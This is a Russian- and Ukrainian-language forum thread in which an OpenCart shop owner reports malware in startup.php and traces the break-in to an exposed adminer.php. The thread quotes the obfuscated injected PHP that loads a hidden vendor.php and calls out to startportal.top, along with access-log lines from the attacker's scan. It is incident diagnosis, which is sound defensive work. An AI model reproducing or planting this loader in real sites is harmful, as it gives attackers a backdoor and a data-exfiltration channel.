Вирус в startup.php

maaby · 14 липня 2024

Добрый день сообщество. Столкнулся с такой проблемой. opencart 3, внесены изменения в файл startup.php
Выглядит это так:

<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>

Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей.
он дальше много чего подгружает.

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт.
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись.

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа.

vendor.php startup.php plugins.php dist.php english.php

SSHEVA · 14 липня 2024

14.07.2024 в 14:33, maaby сказал:
Добрый день сообщество. Столкнулся с такой проблемой. opencart 3, внесены изменения в файл startup.php
Выглядит это так:
<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>
Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей.
он дальше много чего подгружает.

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт.
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись.

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа.

vendor.php 271 \u041a\u0431 · 0 скачиваний startup.php 3 \u041a\u0431 · 0 скачиваний plugins.php 474 \u0411 · 0 скачиваний dist.php 10 \u041a\u0431 · 0 скачиваний english.php 44 \u041a\u0431 · 0 скачиваний

Який хостинг використовуєте? Всі модулі та шаблон куплені, та де саме купували?

maaby · 14 липня 2024

Хостинг в беларуси. Hoster.by, самый лучший, что у нас есть.
99% куплено на этом сайте. Может пару штук купил на opencart.com. Никаких помоек я точно не посещал и ничего из них не качал.

spectre · 14 липня 2024

Вам нужно обратиться к специалисту, например ко мне, и за обычные деньги все решается

Если вы с подобным ранее не сталкивались - у вас не получится, при всем уважении

maaby · 14 липня 2024

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

Yoda · 14 липня 2024

14.07.2024 в 17:53, maaby сказал:

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

SSHEVA · 14 липня 2024

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Звичайно, мені також цікаво))). Я приблизно розумію де він таке взяти міг, але. Може таки все буде добре.

Хоча кажуть, що Самолікування може шкодити здоров'ю.

niger · 14 липня 2024

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

А я пока схожу за картой, чтобы показать откуда на сайт готовилось нападение. 4 разных модуля. У меня и домены есть.

maaby · 15 липня 2024

14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус.

Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок.

NotSlow · 16 липня 2024

14.07.2024 в 14:59, maaby сказал:

Hoster.by, самый лучший

Ну так и писали бы самому лучшему, а не сюда

Доступы есть лишь у вас и у них. Чем кто-то без доступов поможет?

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

Yoda · 16 липня 2024

15.07.2024 в 16:16, maaby сказал:

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус.

Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок.

Надежды юношу питали. Хоть и кацап поет !

buslikdrev · 16 липня 2024

Это ваш сайт? https://aloe.by/adminer.php

maaby · 17 липня 2024

17.07.2024 в 00:28, buslikdrev сказал:

Это ваш сайт? https://aloe.by/adminer.php

Добрый день. Да. Спасибо, что указали мне на этот модуль. Не помню даже, зачем его ставил.

16.07.2024 в 16:22, NotSlow сказал:

Ну так и писали бы самому лучшему, а не сюда

Вы вырвали из контекста мою фразу. Самый лучший в РБ.
Я понимаю, почему вы это пишите... Но я уже давно не живу в Беларуси, т.к. не согласен с тем, что происходит. Правда магазин еще там остался, работает, что-то зарабатывает и помогает оплачивать тут счета. Отказываться от того, что приносит хоть какой-то доп. доход, я не хочу, поймите меня правильно.

16.07.2024 в 16:22, NotSlow сказал:

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

Огромное спасибо за дельный совет! Надо было давно проверить логи, только я с перепуга всё стер, как только увидел
Скорее всего ваш коллега выше уже нашел то, что я должен был обнаружить в логах.

В общем, файл adminer.php лежит уже на сервере с 20го года. Но попытка загрузки сторонних файлов на сайт была только пару недель назад...
Вот интересное еще в логах нашел. Стучались по следующим адресам:

109.196.163.71 - - [02/Jul/2024:09:47:21 +0300] "GET /composer.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:23 +0300] "GET /package.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:25 +0300] "GET /adminer.php HTTP/1.0" 200 4049 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:26 +0300] "GET /phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:29 +0300] "GET /phpMyAdmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:30 +0300] "GET /pma HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:32 +0300] "GET /myadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:34 +0300] "GET /dbadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:37 +0300] "GET /_phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

admirer.php как вы понимаете, был...

Буду обновлять по мере появления новой инфы. Всем еще раз спасибо за наводки и советы.

buslikdrev · 6 серпня 2024

17.07.2024 в 14:57, maaby сказал:

admirer.php как вы понимаете, был...

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

maaby · 15 вересня 2024

06.08.2024 в 15:20, buslikdrev сказал:

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД.
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

maaby · 15 вересня 2024

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус.

SSHEVA · 15 вересня 2024

В 15.09.2024 в 20:39, maaby сказав:

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус.

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

maaby · 16 вересня 2024

15.09.2024 в 20:54, SSHEVA сказал:

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

Спасибо за предложение, я пока сам. Если закончатся идеи, тогда буду искать специалиста.

Yoda · 16 вересня 2024

15.09.2024 в 20:03, maaby сказал:

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД.
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

Битва головы со стеной.
У меня уже третья порция попкорна закончилась!

SSHEVA · 16 вересня 2024

В 16.09.2024 в 18:32, Yoda сказав:

Битва головы со стеной.
У меня уже третья порция попкорна закончилась!

І не кажи, зараз ще 4 принесу, бо бачу це надовго :grin:

Вхід

Вирус в startup.php

Recommended Posts

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Надіслати

Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Створити обліковий запис

Вхід

Зараз на сторінці 0 користувачів

Покупцям

Розробникам

Корисна інформація

Останні розширення

Important Information